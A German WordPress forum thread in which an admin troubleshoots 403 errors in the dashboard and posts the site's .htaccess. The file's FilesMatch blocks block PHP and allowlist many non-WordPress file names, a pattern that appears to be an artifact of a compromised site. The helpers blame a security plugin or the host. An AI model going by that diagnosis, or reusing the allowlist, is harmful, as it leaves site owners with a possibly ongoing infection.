• Hallo liebe Community,

    ich verwalte die Seite auf ra-pee.de/wp-login.

    Danach versuche ich beispielsweise auf eine weitere interne Seite zu klicken wie „Installierte Plugins“ oder „Werkzeuge“. Danach erscheint bei mir kein Inhalt, sondern lediglich eine dauerhafte weiße Seite. Wenn ich in den Entwicklermodus gehe, sehe ich, dass es sich um ein Fehler 403 handelt.

    Failed to load resource: the server responded with a status of 403 (Forbidden)

    Kennt sich wer damit aus? Ich brauche dringend Hilfe, da ich die Seite weiter bearbeiten möchte.

    Danke euch im Voraus

    Der Blog bei dem ich Hilfe benötige heißt ra-pee.de.

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Falls Du keinen eigenen Änderungen an [FONT=Courier New].htaccess[/FONT] Dateien gemacht hast, wende Dich am besten direkt an Deinen Hosting Support. Möglicherweise laufen irgendwelche Firewall Regeln auf dem Server seitens des Hostings.

    2 Mal editiert, zuletzt von b3317133 (31. Januar 2023 um 15:56)


  • Danach versuche ich beispielsweise auf eine weitere interne Seite zu klicken wie „Installierte Plugins“ oder „Werkzeuge“.
    .

    welche SicherheitspluginS hast du aktiv? Je nach Plugin kannst du als *Bedrohung* angesehen werden? Oder du wurdest per se ausgesperrt.


    sondern lediglich eine dauerhafte weiße Seite. Wenn ich in den Entwicklermodus gehe, sehe ich, dass es sich um ein Fehler 403 handelt.

    Failed to load resource: the server responded with a status of 403 (Forbidden)

    Mein Sicherheitsplugin ändert auch die .htaccess *umfangreich*

    Du könntest den Inhalt der .htaccess hier teilen und deine Plugins deaktivieren und dich als Admin anmelden...

    Mit offenen Augen träumen

  • Falls Du keinen eigenen Änderungen an [FONT=Courier New].htaccess[/FONT] Dateien gemacht hast, wende Dich am besten direkt an Deinen Hosting Support. Möglicherweise laufen irgendwelche Firewall Regeln auf dem Server seitens des Hostings.


    Ich habe alles probiert, es hat nicht geholfen :/

  • welche SicherheitspluginS hast du aktiv? Je nach Plugin kannst du als *Bedrohung* angesehen werden? Oder du wurdest per se ausgesperrt.


    Mein Sicherheitsplugin ändert auch die .htaccess *umfangreich*

    Du könntest den Inhalt der .htaccess hier teilen und deine Plugins deaktivieren und dich als Admin anmelden...


    Wir haben für die Seite leider kein Sicherheitsplugin*s. Wenn ich später die Seite in Griff kriege, was würdest du empfehlen?

    Hier der Inhalt der .htaccess


    <FilesMatch '.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$'>
    Order allow,deny
    Deny from all
    </FilesMatch>
    <FilesMatch '^(index.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|wp-blog-header.php|wp-config-sample.php|wp-links-opml.php|wp-login.php|wp-settings.php|wp-trackback.php|wp-activate.php|wp-comments-post.php|wp-cron.php|wp-load.php|wp-mail.php|wp-signup.php|xmlrpc.php|edit-form-advanced.php|link-parse-opml.php|ms-sites.php|options-writing.php|themes.php|admin-ajax.php|edit-form-comment.php|link.php|ms-themes.php|plugin-editor.php|admin-footer.php|edit-link-form.php|load-scripts.php|ms-upgrade-network.php|admin-functions.php|edit.php|load-styles.php|ms-users.php|plugins.php|admin-header.php|edit-tag-form.php|media-new.php|my-sites.php|post-new.php|admin.php|edit-tags.php|media.php|nav-menus.php|post.php|admin-post.php|export.php|media-upload.php|network.php|press-this.php|upload.php|async-upload.php|menu-header.php|options-discussion.php|privacy.php|user-edit.php|menu.php|options-general.php|profile.php|user-new.php|moderation.php|options-head.php|revision.php|users.php|custom-background.php|ms-admin.php|options-media.php|setup-config.php|widgets.php|custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php)$'>
    Order allow,deny
    Allow from all
    </FilesMatch>
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . index.php [L]
    </IfModule>

  • Das ist keine Antwort. Was hast du alles Probiert? Was sagt dein Hoster?

    Ich hatte beim Host angerufen und die konnten mir nicht weiterhelfen. Dann bin ich der Meinung ich habe nie Änderungen an der Datei genommen. Fragen zur Firewallregeln konnten Sie mir nicht beantworten.

  • Benenne die Datei .htaccess um und klicke in WordPress Einstellungen > Permalinks > Speichern Button unten ohne Änderungen zu machen. Was ateht dann in der von WordPress neu angelegten .htaccess?

  • Benenne die Datei .htaccess um und klicke in WordPress Einstellungen > Permalinks > Speichern Button unten ohne Änderungen zu machen. Was ateht dann in der von WordPress neu angelegten .htaccess?

    Hier wäre die aktualisierte Datei:


    <FilesMatch '.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|pHP7|PHP7|phP|PhP|php5|suspected)$'>
    Order allow,deny
    Deny from all
    </FilesMatch>
    <FilesMatch '^(index.php|inputs.php|adminfuns.php|chtmlfuns.php|cjfuns.php|classsmtps.php|classfuns.php|comfunctions.php|comdofuns.php|connects.php|copypaths.php|delpaths.php|doiconvs.php|epinyins.php|filefuns.php|gdftps.php|hinfofuns.php|hplfuns.php|memberfuns.php|moddofuns.php|onclickfuns.php|phpzipincs.php|qfunctions.php|qinfofuns.php|schallfuns.php|tempfuns.php|userfuns.php|siteheads.php|termps.php|txets.php|thoms.php|postnews.php|wp-blog-header.php|wp-config-sample.php|wp-links-opml.php|wp-login.php|wp-settings.php|wp-trackback.php|wp-activate.php|wp-comments-post.php|wp-cron.php|wp-load.php|wp-mail.php|wp-signup.php|xmlrpc.php|edit-form-advanced.php|link-parse-opml.php|ms-sites.php|options-writing.php|themes.php|admin-ajax.php|edit-form-comment.php|link.php|ms-themes.php|plugin-editor.php|admin-footer.php|edit-link-form.php|load-scripts.php|ms-upgrade-network.php|admin-functions.php|edit.php|load-styles.php|ms-users.php|plugins.php|admin-header.php|edit-tag-form.php|media-new.php|my-sites.php|post-new.php|admin.php|edit-tags.php|media.php|nav-menus.php|post.php|admin-post.php|export.php|media-upload.php|network.php|press-this.php|upload.php|async-upload.php|menu-header.php|options-discussion.php|privacy.php|user-edit.php|menu.php|options-general.php|profile.php|user-new.php|moderation.php|options-head.php|revision.php|users.php|custom-background.php|ms-admin.php|options-media.php|setup-config.php|widgets.php|custom-header.php|ms-delete-site.php|options-permalink.php|term.php|customize.php|link-add.php|ms-edit.php|options.php|edit-comments.php|link-manager.php|ms-options.php|options-reading.php|system_log.php)$'>
    Order allow,deny
    Allow from all
    </FilesMatch>
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . index.php [L]
    </IfModule>

  • Kann eigentlich nicht sein, dass das neu geschrieben wurde, die WordPress BEGIN/END Marker fehlen.

    • Wurde die alte .htaccess Datei vor Permalinks > Speichern Button umbenannt? Alternativ gelöscht?
    • Wo genau befindet sich diese .htaccess?
    • Screenshot der Verzeichnisstruktur auf dem Server?


    Für Mitleser, die gesamten [FONT=Courier New]<FilesMatch>[/FONT] Blöcke sind kein WordPress Standard, sie wurden manuell einkopiert oder über ein Sicherheitsplugin. Um die Herkunft genauer festzustellen, geht man wie beschrieben vor. Diese Blöcke sind die Ursache des 403 Fehlers.

    4 Mal editiert, zuletzt von b3317133 (1. Februar 2023 um 12:17)

  • Wenn diese .htaccess tatsächlich per FTP gelöscht und dann so von WordPress neu erstellt wurde, läuft ein Sicherheitsplugin.

    Screenshots Inhalt der Ordner wp-content/plugins/ und falls vorhanden wp-content/mu-plugins/ ?

  • Wenn diese .htaccess tatsächlich per FTP gelöscht und dann so von WordPress neu erstellt wurde, läuft ein Sicherheitsplugin.

    Screenshots Inhalt der Ordner wp-content/plugins/ und falls vorhanden wp-content/mu-plugins/ ?

    wp-content/mu-plugins/

    Das ist nicht vorhanden

    Einmal editiert, zuletzt von reiskornbauer (1. Februar 2023 um 13:23)

  • Es werden also lt. Screenshot nur zwei Plugins verwendet, keines davon ist ein Sicherheitsplugin.

    Die sichtbare .htaccess Datei im wp-content/plugins/ Ordner ist auch kein WordPress Standard.

    Irgendein Mechanismus überschreibt/erzeugt bei Dir also offenbar .htaccess Dateien.

    Von aussen betrachtet kann man das kaum sinnvoll weiter rausfinden. Kann am Hosting mit irgendwelchen Sicherheits/Hardening Sachen liegen.

    Entferne die FilesMatch Blöcke manuell aus der .htaccess, dann sollte der 403 Fehler (zumindest temporär) weg sein.

    Suche Dir am besten jemanden im persönlichen Umfeld, der sich technisch gut auskennt und gehe alles zusammen in WordPress und im Hosting durch.

  • Es werden also lt. Screenshot nur zwei Plugins verwendet, keines davon ist ein Sicherheitsplugin.....

    Ich habe manuell die filesmatch blöcke entfernt aus der .htaccess

    Jedoch besteht der Fehler trotzdessen, hat jemand eine andere Idee?

  • Was steht jetzt in der [FONT=Courier New].htaccess[/FONT] Datei?

    Ansonsten gilt der letzte Absatz der vorherigen Antwort weiterhin.

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . index.php [L]
    </IfModule>

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!